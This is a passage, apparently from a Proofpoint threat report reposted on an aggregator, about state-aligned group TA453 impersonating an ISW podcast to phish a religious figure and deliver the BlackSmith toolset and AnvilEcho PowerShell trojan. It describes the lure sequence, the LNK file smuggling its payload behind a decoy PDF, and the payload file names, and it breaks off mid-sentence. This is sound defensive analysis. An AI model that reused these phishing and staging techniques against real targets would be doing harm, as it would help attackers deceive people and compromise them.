ISW Podcast being impersonated by TA453. It is likely that TA453 was attempting to normalize the target clicking a link and entering a password so the target would do the same when they delivered malware. Initial July 2024 approach from TA453. DocSend contents containing the podcast themed text. Proofpoint first observed TA453 spoofing the Institute for the Study of War (ISW) in phishing campaigns targeting other organizations starting in February 2024, almost immediately after registering the domain in late January 2024. The theme of spoofing is consistent with broader TA453 phishing activity reported by Google Threat Intelligence Group in August 2024 TA453 initially sent the fake podcast invitation to the religious figure at multiple email accounts, specifically both the target\'s organizational email address along with their personal email address. Phishing multiple email addresses associated with a target has been observed by a number of state aligned threats, including TA427. TA453 continued to establish their legitimacy by sending emails from understandingthewar[.]org and including a TA453 controlled Hotmail account in the email signature. After another reply from the target, TA453 replied with a GoogleDrive URL leading to a ZIP archive named “Podcast Plan-2024.zip”. The ZIP contained an LNK titled “Podcast Plan 2024.lnk”. The LNK delivered the BlackSmith toolset which eventually loaded TA453\'s AnvilEcho Powershell Trojan. Fake podcast invitation containing a malicious URL. Malware analysis Old habits die screaming, and TA453 sticks to its habits. Our analysis of the malware from this TA453 campaign demonstrates the developers working for TA453 have not given up on using modular PowerShell backdoors. They continue to attempt to evade detections by convoluting the infection chain in order to limit and avoid detection opportunities while collecting intelligence. The toolset observed in this infection chain is likely the successor of GorjolEcho/PowerStar, TAMECURL, MischiefTut, and CharmPower. The first TA453 backdoor was detected by Proofpoint in Fall 2021. Rather than deploy each Powershell module separately, TA453 attempts to bundle the entire framework into a single large PowerShell script dubbed AnvilEcho by Proofpoint. Timeline of TA453 malware. Infection chain The LNK is used to smuggle additional files. It hides behind a decoy PDF as an overlay and extracts the contents of the ZIP folder to %TEMP%. The ZIP folder contains Beautifull.jpg, mary.dll, qemus (the encrypted AnvilEcho PowerShell script), soshi.dll, and toni.dll. A PDB path of E:\FinalS | Malware Threat Studies | APT 35 APT 42 | ★★★ |
To see everything:
Our RSS (filtrered)
